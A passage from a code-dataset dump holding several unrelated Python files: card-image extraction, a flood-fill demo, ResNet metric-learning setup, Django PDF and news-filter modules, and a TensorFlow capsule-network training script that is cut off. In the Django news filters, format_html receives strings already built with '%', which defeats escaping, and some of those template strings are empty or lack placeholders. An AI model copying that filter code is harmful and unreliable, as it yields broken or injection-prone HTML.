find_cross(left[1], left[0], bottom[0],bottom[1])\n bottom_right = find_cross(right[1], right[0], bottom[1],bottom[0])\n\n # Rotate and crop card using corners\n\n # Use this https://stackoverflow.com/questions/71724403/crop-an-image-in-pil-using-the-4-points-of-a-rotated-rectangle\n # Define 8-tuple with x,y coordinates of top-left, bottom-left, bottom-right and top-right corners and apply\n transform=[*top_left,*bottom_left,*bottom_right, *top_right]\n size = (card_w,card_h)\n\n result = image_box.transform(size, ImageTransform.QuadTransform(transform), resample=Image.Resampling.BICUBIC)\n \n return result\n\ndef find_cross(p1,p2,q1,q2):\n # p(t) = a*t + b\n a = p1-p2\n b = p2\n\n # q(t) = c*t + d\n c = q1-q2\n d = q2\n\n # Solve p(t1) = q(t2), i.e. At = bm\n A = np.array([a, -c]).T\n bm = d-b\n\n t = np.linalg.solve(A,bm)\n\n # Calculate point using p(t1)\n x = a*t[0] + b\n\n return x\n\ndef swap_points(p):\n res = []\n for i in range(len(p)):\n res.append([p[i][1], p[i][0]])\n return res\n\ndef process_horisontal(img_array, target, threshold):\n h = img_array.shape[0]\n\n border = (h - card_h)\n safety = 5\n\n # Top\n start = border + card_corner_size + safety\n end = card_top_part_h - safety\n horisontal_lines = [i for i in range(start, end, 1)]\n\n # Bottom\n start = card_h + border - card_bottom_part_h + safety\n end = card_h - border - card_corner_size - safety\n for i in range(start, end, 1):\n horisontal_lines.append(i)\n\n return process_horisontal_lines(img_array, horisontal_lines, target, threshold)\n\ndef process_horisontal_lines(img_array, lines, target, threshold):\n points_left = []\n points_right = []\n for line in lines:\n line_slice = img_array[line, :]\n (px1,px2) = find_line_in_slice(line_slice, target, threshold)\n points_left.append(np.array([px1, line]))\n points_right.append(np.array([px2, line]))\n\n return (points_left, points_right)\n\ndef process_vertical(img_array,target, threshold):\n w = img_array.shape[1]\n \n border = (w - card_w)\n safety = 5\n\n start = border + card_corner_size + safety\n end = w - start\n vertical_lines = [i for i in range(start,end,1)]\n\n points_top = []\n points_bottom = []\n for line in vertical_lines:\n line_slice = img_array[:, line]\n (px1,px2) = find_line_in_slice(line_slice, target, threshold)\n points_top.append(np.array([line, px1 ]))\n points_bottom.append(np.array([line, px2]))\n\n return (points_top, points_bottom)\n\ndef find_line_in_slice(img_slice, target_color, threshold=100):\n\n idx = []\n for i in range(len(img_slice)):\n color = img_slice[i]\n diff = target_color - color\n d = np.linalg.norm(diff)\n if(d < threshold):\n idx.append(i)\n\n first = idx[0]\n last = idx[-1]\n\n return (first, last)\n\n\nif __name__ == '__main__':\n path = 'img_src\\\\card_split\\\\FR003.png'\n img = extract_card(Image.open(path), draw=False)\n\n img.save('test.png')","repo_name":"hauk88/CardExtractor","sub_path":"extract_card.py","file_name":"extract_card.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38656613883","text":"t = int(input())\nfor tc in range(1, t+1):\n target = list(input())\n val = ['0'] * len(target)\n ans = 0\n for i in range(len(target)):\n if val[i] != target[i]:\n ans += 1\n for j in range(i, len(target)):\n val[j] = target[i]\n\n\n print('#{} {}'.format(tc, ans))\n\n","repo_name":"toki0411/Algorithm","sub_path":"SWEA/D3/1289. 원재의 메모리 복구하기/원재의 메모리 복구하기.py","file_name":"원재의 메모리 복구하기.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2134898075","text":"#!/usr/bin/env python3\nimport time\nimport os\n\ndef get_array_from_string(string):\n \"\"\"Turns a string into a list of lists (\"an array\"), and returns\n a tuple consisting of the array, the height and the width.\n \"\"\"\n array = []\n for row in string.split(\"\\n\"):\n if row:\n array.append(list(row))\n height = len(array)\n width = len(array[0])\n return array, height, width\n\ndef print_array(array):\n \"\"\"Takes a list of lists `array` and prints it to the screen, row for row,\n by joining each row with \"\".join\n \"\"\"\n for row in array:\n print(\"\".join(row))\n \n \ndef print_array_and_clear_and_wait(array):\n print_array(array)\n time.sleep(0.25)\n \n # Windows command line uses cls instead of clear to clear the terminal\n if os.name == \"nt\":\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n\nbean = \"\"\"\n xxxx \n x x\nx xx \nx x \nx x \n xxxx \n\"\"\"\n\nWALL = \"x\"\nEMPTY = \" \"\narray, HEIGHT, WIDTH = get_array_from_string(bean)\n\ndef get_valid_neighbors(y, x):\n valid_neighbors = []\n for neighbor_y, neighbor_x in [\n (y-1, x),\n (y+1, x),\n (y, x+1),\n (y, x-1),\n ]:\n if neighbor_y >= 0 and neighbor_y < HEIGHT and \\\n neighbor_x >= 0 and neighbor_x < WIDTH:\n valid_neighbors.append((neighbor_y, neighbor_x))\n return valid_neighbors\n \ndef fill_array_at_point(array, y, x, fillchar):\n if array[y][x] == EMPTY:\n array[y][x] = fillchar\n print_array_and_clear_and_wait(array)\n for neighbor_y, neighbor_x in get_valid_neighbors(y, x):\n fill_array_at_point(array, neighbor_y, neighbor_x, fillchar)\n\ndef main():\n fill_array_at_point(array, 1, 2, 'o')\n print_array(array)\n\nmain()\n","repo_name":"Ran4/dd1331-public","sub_path":"ex04/filler_with_animation.py","file_name":"filler_with_animation.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16365471580","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.models as models\n\nfrom torch.optim import lr_scheduler\nfrom pytorch_metric_learning import distances, losses, miners, reducers, testers\n\nfrom src.configs import DEVICE\nfrom src.models.model_types import ModelTypes\nfrom src.models.multilabel_classifier import MultilabelClassifier\nfrom src.losses.custom_constractive_loss import CustomContrastiveLoss\n\n\nclass ResNetInitializer:\n def __init__(self, model_type, num_superclasses, num_classes, embedding_size=None):\n # Load the pretrained model\n backbone_model = models.resnet18(pretrained=True)\n criterion = None\n model = None\n model_name = None\n\n num_ftrs = backbone_model.fc.in_features\n if model_type == ModelTypes.PLAIN_BACKBONE:\n model_name = 'plain_resnet18'\n # Here the size of each output sample is set to num_superclasses.\n backbone_model.fc = nn.Linear(num_ftrs, num_superclasses)\n model = backbone_model\n elif model_type == ModelTypes.TUNED_WITH_CROSS_ENTROPY:\n model_name = 'resnet18_with_cross_entropy_loss'\n criterion = nn.CrossEntropyLoss()\n model = MultilabelClassifier(backbone_model, num_ftrs, num_superclasses, num_classes)\n elif model_type == ModelTypes.TUNED_WITH_ARCFACE:\n model_name = 'resnet18_with_arcface_loss'\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n # We need a separate optimizer for ArcFace Loss!!!\n # Loss for classes\n self.class_criterion = losses.ArcFaceLoss(num_classes, embedding_size).to(DEVICE)\n self.class_loss_optimizer = torch.optim.SGD(self.class_criterion.parameters(), lr=0.01)\n # Loss for superclasses\n self.superclass_criterion = losses.ArcFaceLoss(num_superclasses, embedding_size).to(DEVICE)\n self.superclass_loss_optimizer = torch.optim.SGD(self.superclass_criterion.parameters(), lr=0.01)\n elif model_type == ModelTypes.TUNED_SIAMESE_WITH_CUSTOM_CONTRASTIVE:\n model_name = 'resnet18_siamese_with_custom_contrastive_loss'\n criterion = CustomContrastiveLoss()\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n elif model_type == ModelTypes.TUNED_SIAMESE_WITH_CONTRASTIVE:\n model_name = 'resnet18_siamese_with_contrastive_loss'\n criterion = losses.ContrastiveLoss().to(DEVICE)\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n elif model_type == ModelTypes.TUNED_WITH_TRIPLET:\n model_name = 'resnet18_with_triplet_loss'\n # Use primitives from pytorch-metric-learning library\n distance = distances.CosineSimilarity()\n reducer = reducers.ThresholdReducer(low=0)\n criterion = losses.TripletMarginLoss(margin=0.5, distance=distance, reducer=reducer).to(DEVICE)\n self.mining_func = miners.TripletMarginMiner(\n margin=0.5, distance=distance, type_of_triplets=\"semihard\"\n )\n model = MultilabelClassifier(backbone_model, num_ftrs, embedding_size, embedding_size)\n\n self.model = model.to(DEVICE)\n self.criterion = criterion\n self.model_name = model_name\n\n # Observe that all parameters are being optimized\n self.optimizer = optim.SGD(self.model.parameters(), lr=0.001, momentum=0.9)\n\n # Decay LR by a factor of 0.1 every 7 epochs\n self.scheduler = lr_scheduler.StepLR(self.optimizer, step_size=7, gamma=0.1)\n\n def get_model_name(self):\n return self.model_name\n","repo_name":"denysgerasymuk799/UCU_CV_Metric_Learning_HW","sub_path":"src/models/resenet_initializer.py","file_name":"resenet_initializer.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33131552942","text":"from django.contrib.auth.decorators import login_required\nfrom api.models import ProgramModel, SubplanModel\nfrom django.shortcuts import render\n\nfrom django_weasyprint import WeasyTemplateResponse\nfrom django.forms.models import model_to_dict\n\nfrom ui.views.staff.view import pretty_print_reqs, pretty_print_rules\n\n\n# check if asking for a published id, if not then we need to check if user is authenticated\ndef check_published(request):\n id_to_view = request.GET.get('id', None)\n\n published = ProgramModel.objects.filter(id=int(id_to_view), publish=True)\n if published:\n return view_program_pdf(request)\n else:\n return check_authentication(request)\n\n\n# forces/check if user is authenticated\n@login_required()\ndef check_authentication(request):\n return view_program_pdf(request)\n\n\ndef view_program_pdf(request):\n \"\"\" Renders a program to a PDF. \"\"\"\n\n id_to_view = request.GET.get('id', None)\n\n # https://stackoverflow.com/questions/21925671/convert-django-model-object-to-dict-with-all-of-the-fields-intact\n\n instance = model_to_dict(ProgramModel.objects.get(id=int(id_to_view)))\n pretty_print_reqs(instance)\n pretty_print_rules(instance)\n\n subplans = SubplanModel.objects.all()\n\n context = {\n \"program\": instance,\n 'subplans': subplans\n }\n\n if \"raw\" in request.GET:\n return render(request, 'pdf_program.html', context=context)\n else:\n response = WeasyTemplateResponse(request=request, content_type='application/pdf',\n filename=instance[\"name\"] + \".pdf\", attachment=False,\n template=\"pdf_program.html\", context=context)\n\n return response.render()\n","repo_name":"cass-degrees/CASS-Degrees-Code","sub_path":"cassdegrees/ui/views/pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"41219947241","text":"from django import template\nfrom django.core.urlresolvers import reverse\nfrom django.db.models.query_utils import Q\nfrom django.utils.html import format_html\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom coffee.models import News\nfrom misc.models import get_public_group\n\nregister = template.Library()\n\n\ndef get_group_filter(user):\n if user.is_superuser:\n q = Q()\n elif user.is_authenticated():\n q = Q(target_groups__in=user.groups.all())\n else:\n q = Q(target_groups__in=[get_public_group().pk, ])\n return q\n\n\n@register.filter(name='has_news')\ndef has_news(user):\n return user is not None and get_news(user).exists()\n\n\n@register.filter(name='has_many_news')\ndef has_many_news(user):\n return user is not None and get_news(user).count() > 1\n\n\n@register.filter(name='get_news')\ndef get_news(user):\n return News.objects_active().filter(get_group_filter(user))\n\n\n@register.filter(name='get_news_with_count_range')\ndef get_news_with_count_range(user):\n i = 0\n for n in News.objects_active().filter(get_group_filter(user)):\n yield (i, n)\n i += 1\n\n\n@register.filter(name='get_news_count_range')\ndef get_news_count_range(user):\n return range(0, News.objects_active().filter(get_group_filter(user)).count())\n\n\n@register.filter(name='news_as_href')\ndef news_as_href(news):\n return format_html(\n '%s' %\n (\n reverse('misc:news_list'),\n news.pk,\n news_as_span(news),\n )\n )\n\n\n@register.filter(name='news_as_span')\ndef news_as_span(news):\n if news.title:\n return format_html(\n '%s %s%s' % (news.severity_str(), news.title, _(':'), news.body[:80]))\n else:\n return format_html('%s' % (news.severity_str(), news.body))\n\n\n@register.filter(name='news_as_div')\ndef news_as_div(news):\n # if news.title:\n return format_html(\n '' %\n {\n 'pk': news.pk,\n 'severity_str': news.severity_str(),\n 'news_list': reverse('misc:news_list'),\n 'included': reverse('misc:news', args=[news.pk]),\n 'as_html': news.as_html(),\n }\n )","repo_name":"jolorenzo/my_site","sub_path":"misc/templatetags/news_filters.py","file_name":"news_filters.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73160267345","text":"from __future__ import absolute_import, division, print_function\n\nimport os \nimport sys \nimport time \nimport re \nfrom glob import glob\nfrom pprint import pprint\nimport numpy as np \nimport tensorflow as tf \n\nfrom input_data.mnist import mnist_input, mnist_dream_inputs\nfrom input_data.fashion_mnist import fashion_mnist_input, fashion_mnist_dream_input\nfrom input_data.svhn import svhn_input, svhn_dream_input\nfrom input_data.cifar10 import cifar10_input, cifar10_dream_input\nfrom input_data.noise import noise_dream_input\n\nfrom models import cnn_model\nfrom models import capsule_model\n\nfrom grad import naive_max_norm, max_norm_diff, naive_max_caps_dim, max_caps_dim_diff, utils\n\nfrom config import FLAGS, default_hparams\n\nMODELS = {\n 'cnn': cnn_model.CNNModel,\n 'cap': capsule_model.CapsuleModel\n}\n\nINPUTS = {\n 'mnist': mnist_input,\n 'fashion_mnist': fashion_mnist_input,\n 'svhn': svhn_input,\n 'cifar10': cifar10_input\n}\n\nDREAM_INPUTS = {\n 'mnist': mnist_dream_inputs,\n 'fashion_mnist': fashion_mnist_dream_input,\n 'svhn': svhn_dream_input,\n 'cifar10': cifar10_dream_input\n}\n\nVIS_GRAD_COMPUTER = {\n 'naive_max_norm': naive_max_norm,\n 'max_norm_diff': max_norm_diff,\n 'naive_max_caps_dim': naive_max_caps_dim,\n 'max_caps_dim_diff': max_caps_dim_diff\n}\n\nMETHOD_TYPES = ['normal', 'ensemble']\n\nNORM_ASPECT_TYPES = ['naive_max_norm', 'max_norm_diff']\n\nDIRECTION_ASPECT_TYPES = ['naive_max_caps_dim', 'max_caps_dim_diff']\n\ndef _compute_entropy(arr):\n \"\"\"Given a numpy array compute the entropy of it\n Args:\n arr: a numpy array;\n Returns:\n entropy: scalar, the entropy of the given array;\n \"\"\"\n arr_sum = np.sum(arr)\n arr_exp = np.exp(arr)\n entropy = - np.dot(arr_exp/arr_sum, arr)\n return entropy\n\ndef get_distributed_dataset(total_batch_size, num_gpus,\n max_epochs, data_dir, dataset, image_size,\n split='default', n_repeats=None):\n \"\"\"Reads the input data using 'input_data' functions.\n\n For 'train' and 'test' splits,\n given {num_gpus} GPUs and {total_batch_size}, we distribute\n those {total_batch_size} into {num_gpus} partitions,\n denoted as {batch_size}.\n\n For 'noise' and 'dream' splits,\n check if {total_batch_size} ≡ 1, otherwise raise 'ValueError'.\n In this case, we will duplicate every example {num_gpus} times \n so that when we pass the examples into multi-tower models, it is \n calculating and averaging the gradients of the same images.\n\n Args:\n total_batch_size: total number of data entries over all towers;\n num_gpus: number of GPUs available to use;\n max_epochs: for 'train' split, this parameter decides the number of \n epochs to train for the model; for 'test' split, this parameter\n should ≡ 1.\n data_dir: the directory containing the data;\n dataset: the name of the dataset;\n image_size: image size after cropping;\n split: 'train', 'test', 'noise', 'dream';\n n_repeats ('noise' and 'dream'): the number of repeats of the same image.\n Returns:\n batched_dataset: dataset object;\n specs: dataset specifications.\n \"\"\"\n assert dataset in ['mnist', 'fashion_mnist', 'svhn', 'cifar10']\n with tf.device('/gpu:0'):\n if split in ['train', 'test']:\n assert total_batch_size % num_gpus == 0\n distributed_dataset, specs = INPUTS[dataset].inputs(\n total_batch_size, num_gpus, max_epochs, image_size, \n data_dir, split)\n return distributed_dataset, specs\n elif split == 'noise':\n batched_dataset, specs = noise_dream_input.inputs(\n 'noise', 1, max_epochs, n_repeats, image_size)\n return batched_dataset, specs\n elif split == 'dream':\n batched_dataset, specs = DREAM_INPUTS[dataset].inputs(\n 'train', data_dir, max_epochs, n_repeats, image_size)\n return batched_dataset, specs\n else:\n raise ValueError()\n\ndef find_event_file_path(load_dir):\n \"\"\"Finds the event file.\n\n Args:\n load_dir: the directory to look for the training checkpoints.\n Returns:\n path to the event file.\n \"\"\"\n fpath_list = glob(os.path.join(load_dir, 'events.*'))\n if len(fpath_list) == 1:\n return fpath_list[0]\n else:\n raise ValueError\n\ndef find_latest_checkpoint_info(load_dir, find_all=False):\n \"\"\"Finds the latest checkpoint information.\n\n Args:\n load_dir: the directory to look for the training checkpoints.\n Returns:\n latest global step, latest checkpoint path, step_ckpt pair list\n \"\"\"\n ckpt = tf.train.get_checkpoint_state(load_dir)\n if ckpt and ckpt.model_checkpoint_path:\n latest_step = extract_step(ckpt.model_checkpoint_path)\n if find_all == True:\n ckpt_paths = glob(os.path.join(load_dir, 'model.ckpt-*.index'))\n pairs = [(int(re.search('\\d+', os.path.basename(path)).group(0)), \n os.path.join(os.path.dirname(path), os.path.basename(path)[:-6]))\n for path in ckpt_paths]\n pairs = sorted(pairs, key=lambda pair: pair[0])\n else:\n pairs = []\n return latest_step, ckpt.model_checkpoint_path, pairs\n return -1, None, []\n\ndef extract_step(path):\n \"\"\"Returns the step from the file format name of Tensorflow checkpoints.\n\n Args:\n path: The checkpoint path returned by tf.train.get_checkpoint_state.\n The format is: {ckpnt_name}-{step}\n Returns:\n The last training step number of the checkpoint.\n \"\"\"\n file_name = os.path.basename(path)\n return int(file_name.split('-')[-1])\n\ndef _write_specs_file(write_dir, aspect_type, dataset, total_batch_size, \n max_epochs, iter_n, step, threshold):\n write_dir = os.path.join(write_dir, 'max_ep{}-iter_n{}-step{}-th{}'.format(\n max_epochs, iter_n, step, threshold))\n if not os.path.exists(write_dir):\n os.makedirs(write_dir)\n with open(os.path.join(write_dir, 'specs.txt'), 'w+') as f:\n f.write('explore type: {};\\n'.format(aspect_type))\n f.write('dataset: {};\\n'.format(dataset))\n f.write('total_batch_size: {};\\n'.format(total_batch_size))\n f.write('max_epochs: {};\\n'.format(max_epochs))\n f.write('iter_n: {};\\n'.format(iter_n))\n f.write('step: {};\\n'.format(step))\n f.write('threshold: {};\\n'.format(threshold))\n return write_dir\n\ndef run_train_session(iterator, specs, \n summary_dir, max_epochs,\n joined_result, save_epochs):\n \"\"\"Starts a session, train the model, write summary into an event file,\n and save the whole graph one time and variable every {save_epochs} epochs.\n \n Args:\n iterator: dataset iterator;\n specs: dict, dataset specifications;\n summary_dir: str, directory to store ckpts;\n joined_result: namedtuple, TowerResult('inferred', 'train_op',\n 'summary', 'correct', 'accuracy');\n save_epochs: scalar, how often to save the data.\n \"\"\"\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # declare summary writer and save the graph in the meanwhile\n writer = tf.summary.FileWriter(summary_dir, sess.graph)\n # declar batched data instance and initialize the iterator\n batch_data = iterator.get_next()\n sess.run(iterator.initializer)\n # initialize variables\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n sess.run(init_op)\n # declare saver object for future saving\n saver = tf.train.Saver(max_to_keep=None)\n\n epoch_time = 0\n total_time = 0\n step_counter = 0\n epochs_done = 0\n # restore ckpt if not restart\n latest_step, latest_checkpoint_fpath, _ = find_latest_checkpoint_info(summary_dir, False)\n if latest_step != -1 and latest_checkpoint_fpath != None:\n saver.restore(sess, latest_checkpoint_fpath)\n step_counter = latest_step\n epochs_done = step_counter // specs['steps_per_epoch']\n total_steps = specs['steps_per_epoch'] * (max_epochs - epochs_done)\n\n # start feeding process\n for _ in range(total_steps):\n start_anchor = time.time() # time anchor\n step_counter += 1\n\n try:\n # get placeholders and create feed_dict\n feed_dict = {} \n for i in range(specs['num_gpus']):\n batch_val = sess.run(batch_data)\n feed_dict[tf.get_collection('tower_%d_batched_images' % i)[0]] = batch_val['images']\n feed_dict[tf.get_collection('tower_%d_batched_labels' % i)[0]] = batch_val['labels']\n \n \"\"\"Run inferences\"\"\"\n summary, accuracy, _ = sess.run(\n [joined_result.summary, joined_result.accuracy, joined_result.train_op],\n feed_dict=feed_dict)\n \"\"\"Add summary\"\"\"\n writer.add_summary(summary, global_step=step_counter)\n # calculate time\n time_consuming = time.time() - start_anchor\n epoch_time += time_consuming\n total_time += time_consuming\n \"\"\"Save ckpts\"\"\"\n if step_counter % (specs['steps_per_epoch'] * save_epochs) == 0:\n ckpt_path = saver.save(\n sess, os.path.join(summary_dir, 'model.ckpt'),\n global_step=step_counter)\n print(\"{0} epochs done (step = {1}), accuracy {2:.4f}. {3:.2f}s, checkpoint saved at {4}\".format(\n step_counter // specs['steps_per_epoch'], \n step_counter, \n accuracy, \n epoch_time, \n ckpt_path))\n epoch_time = 0\n elif step_counter % specs['steps_per_epoch'] == 0:\n print(\"{0} epochs done (step = {1}), accuracy {2:.4f}. {3:.2f}s\".format(\n step_counter // specs['steps_per_epoch'], \n step_counter, \n accuracy, \n epoch_time))\n epoch_time = 0\n else:\n print(\"running {0} epochs {1:.1f}%, total time ~ {2}:{3}:{4}\".format(\n step_counter // specs['steps_per_epoch'] + 1,\n step_counter % specs['steps_per_epoch'] * 100.0 / specs['steps_per_epoch'],\n int(total_time // 3600), \n int(total_time % 3600 // 60), \n int(total_time % 60)),\n end='\\r')\n except tf.errors.OutOfRangeError:\n break\n # Finished one step\n print('total time: {0}:{1}:{2}, accuracy: {3:.4f}.'.format(\n int(total_time // 3600), \n int(total_time % 3600 // 60), \n int(total_time % 60),\n accuracy))\n\ndef train(hparams, num_gpus, data_dir, dataset, model_type, total_batch_size, image_size,\n summary_dir, save_epochs, max_epochs):\n \"\"\"Trains a model.\n\n It will initialize the model with either previously a saved model ckpt in\n the {summary_dir} directory or start from scratch if the directory is empty.\n The training is distributed on {num_gpus} GPUs. It writes a summary at \n every step and saves the model every {save_epochs} epochs.\n\n Args:\n hparams: the hyperparameters to build the model graph;\n num_gpus: number of GPUs to use;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiment;\n model_type: the name of model architecture;\n total_batch_size: total batch size, which will be distributed to {num_gpus} GPUs;\n image_size: image size after cropping/resizing;\n summary_dir: the directory to write summaries and save the model;\n save_epochs: how often the training model should be saved;\n max_epochs: maximum epochs to train.\n \"\"\"\n # define subfolder in {summary_dir}\n summary_dir = os.path.join(summary_dir, 'train')\n # define model graph\n with tf.Graph().as_default():\n # get batched dataset and declare initializable iterator\n distributed_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n 'train')\n iterator = distributed_dataset.make_initializable_iterator()\n # initialize model with hparams and specs\n model = MODELS[model_type](hparams, specs)\n # build a model on multiple gpus and returns a tuple of \n # (a list of input tensor placeholders, a list of output tensor placeholders)\n joined_result = model.build_model_on_multi_gpus()\n\n \"\"\"Print stats\"\"\"\n param_stats = tf.contrib.tfprof.model_analyzer.print_model_analysis(\n tf.get_default_graph(),\n tfprof_options=tf.contrib.tfprof.model_analyzer.TRAINABLE_VARS_PARAMS_STAT_OPTIONS)\n sys.stdout.write('total_params: %d\\n' % param_stats.total_parameters)\n \"\"\"\"\"\"\n\n run_train_session(iterator, specs, \n summary_dir, max_epochs,\n joined_result, save_epochs)\n\ndef run_evaluate_session(iterator, specs, load_dir, summary_dir, kind, \n model_type, threshold):\n \"\"\"Find available ckpts and iteratively load the graph and variables.\n\n Args:\n iterator: dataset iterator;\n specs: dict, dataset specifications;\n load_dir: str, directory to load graph;\n summary_dir: str, directory to store ckpts;\n kind: 'train' or 'test';\n model_type: 'cnn' or 'cap';\n threhold: if {model_type}='cnn', then it should be None; \n else, it is threshold to filter capsules;\n \"\"\"\n # create summary folder if not exists\n if not os.path.exists(summary_dir):\n os.makedirs(summary_dir)\n\n \"\"\"Load available ckpts\"\"\"\n # find latest step, ckpt, and all step-ckpt pairs\n latest_step, latest_ckpt_path, all_step_ckpt_pairs = find_latest_checkpoint_info(load_dir, True)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('{0}\\n ckpt files not fould!\\n {0}'.format('='*20))\n else:\n print('{0}\\nFound a ckpt!\\n{0}'.format('='*20))\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # import compute graph\n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n # get dataset object working\n batch_data = iterator.get_next()\n\n acc_t = tf.get_collection('accuracy')[0]\n step_mean_acc_pairs = []\n\n # iteratively restore variables and run evaluations\n for idx, (step, ckptpath) in enumerate(all_step_ckpt_pairs):\n # restore variables\n saver.restore(sess, ckptpath)\n\n sess.run(iterator.initializer)\n accs = []\n\n while True:\n try: \n # get placeholders and create feed dict\n feed_dict = {}\n for i in range(specs['num_gpus']):\n batch_val = sess.run(batch_data)\n feed_dict[tf.get_collection('tower_%d_batched_images' % i)[0]] = batch_val['images']\n feed_dict[tf.get_collection('tower_%d_batched_labels' % i)[0]] = batch_val['labels']\n\n acc = sess.run(acc_t, feed_dict=feed_dict)\n accs.append(acc)\n except tf.errors.OutOfRangeError:\n break\n mean_acc = sum(accs) / len(accs)\n step_mean_acc_pairs.append((step, mean_acc))\n \n print('step: {0}, accuracy = {1:.4f} ~ {2} / {3}'.format(step, mean_acc, idx+1, len(all_step_ckpt_pairs)))\n with open(os.path.join(summary_dir, '%s_history.txt') % kind, 'w+') as f:\n for step, mean_acc in step_mean_acc_pairs:\n f.write('{}, {}\\n'.format(step, mean_acc))\n\ndef evaluate(num_gpus, data_dir, dataset, model_type, total_batch_size, image_size,\n threshold, summary_dir, max_epochs):\n \"\"\"Iteratively restore the graph and variables, and return the data to train and test curve.\n \n Args:\n num_gpus: number of GPUs to use;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiment;\n model_type: the name of model architecture;\n total_batch_size: total batch size, which will be distributed to {num_gpus} GPUs;\n image_size: image size after cropping/resizing;\n threshold: threshold to filter out the target capsule effect;\n summary_dir: the directory to write summaries and save the model;\n max_epochs: maximum epochs to evaluate, ≡ 1.\n \"\"\"\n # define subfolder to load ckpt and write related files\n load_dir = os.path.join(summary_dir, 'train')\n summary_dir = os.path.join(summary_dir, 'evaluate')\n # declare an empty model graph\n with tf.Graph().as_default():\n # get train batched dataset and declare initializable iterator\n train_distributed_dataset, train_specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n 'train')\n train_iterator = train_distributed_dataset.make_initializable_iterator()\n # call evaluate experiment\n run_evaluate_session(train_iterator, train_specs, load_dir, summary_dir, 'train', \n model_type, threshold)\n with tf.Graph().as_default():\n # get test batched dataset and delcare initializable iterator\n test_distributed_dataset, test_specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n 'test')\n test_iterator = test_distributed_dataset.make_initializable_iterator()\n # call evaluate experiment\n run_evaluate_session(test_iterator, test_specs, load_dir, summary_dir, 'test', \n model_type, threshold)\n\ndef run_test_session(iterator, specs, load_dir):\n \"\"\"Load available ckpts\"\"\"\n latest_step, latest_ckpt_path, _ = find_latest_checkpoint_info(load_dir, False)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('{0}\\n ckpt files not found!\\n {0}'.format('='*20))\n else:\n print('{0}\\nFound a ckpt!\\n{0}'.format('='*20))\n latest_ckpt_meta_path = latest_ckpt_path + '.meta'\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n # import compute graph\n saver = tf.train.import_meta_graph(latest_ckpt_meta_path)\n # get dataset object working\n batch_data = iterator.get_next()\n\n acc_t = tf.get_collection('accuracy')[0]\n \n # restore variables \n saver.restore(sess, latest_ckpt_path)\n sess.run(iterator.initializer)\n\n accs = []\n while True:\n try:\n feed_dict = {}\n for i in range(specs['num_gpus']):\n batch_val = sess.run(batch_data)\n feed_dict[tf.get_collection('tower_%d_batched_images' % i)[0]] = batch_val['images']\n feed_dict[tf.get_collection('tower_%d_batched_labels' % i)[0]] = batch_val['labels']\n acc = sess.run(acc_t, feed_dict=feed_dict)\n accs.append(acc)\n except tf.errors.OutOfRangeError:\n break\n print(accs)\n mean_acc = np.mean(accs)\n print(mean_acc)\n\ndef test(split, num_gpus, data_dir, dataset, total_batch_size, image_size, summary_dir, max_epochs):\n # define subfolder to load ckpt\n load_dir = os.path.join(summary_dir, 'train')\n # declare an empty model graph\n with tf.Graph().as_default():\n # get train batched dataset and declare initializable iterator\n distributed_dataset, specs = get_distributed_dataset(\n total_batch_size, num_gpus, max_epochs,\n data_dir, dataset, image_size,\n split)\n iterator = distributed_dataset.make_initializable_iterator()\n # call test experiment\n run_test_session(iterator, specs, load_dir)\n\ndef run_norm_aspect(num_gpus, total_batch_size, max_epochs, data_dir, dataset, image_size,\n iter_n, step, threshold,\n load_dir, summary_dir, aspect_type):\n \"\"\"Run norm aspect exploration. Producing results to summary_dir.\n \n Args:\n num_gpus: number of GPUs available to use;\n total_batch_size: total batch size, ≡ 1;\n max_epochs: maximum epochs to train;\n data_dir: the directory containing the input data;\n dataset: the name of the dataset for the experiments;\n image_size: image size after cropping or resizing;\n iter_n: number of iterations to add gradients to original image;\n step: step size of each iteration of gradient ascent to mutliply;\n threshold: any gradients less than this value will not be added to the original image;\n load_dir: the directory to load files;\n summary_dir: the directory to write files;\n aspect_type: 'naive_max_norm' or 'max_norm_diff'.\n \"\"\"\n # wrtie specs file \n write_dir = _write_specs_file(summary_dir, aspect_type, dataset, total_batch_size,\n max_epochs, iter_n, step, threshold)\n # find out whether to feed in noise or normal images\n if 'noise_' in aspect_type:\n aspect_type = aspect_type[6:]\n split = 'noise'\n else:\n split = 'dream'\n\n # find latest ckpt information\n latest_step, latest_ckpt_path, _ = find_latest_checkpoint_info(load_dir)\n if latest_step == -1 or latest_ckpt_path == None:\n raise ValueError('{0}\\nckpt files not found!\\n{0}'.format('='*20))\n 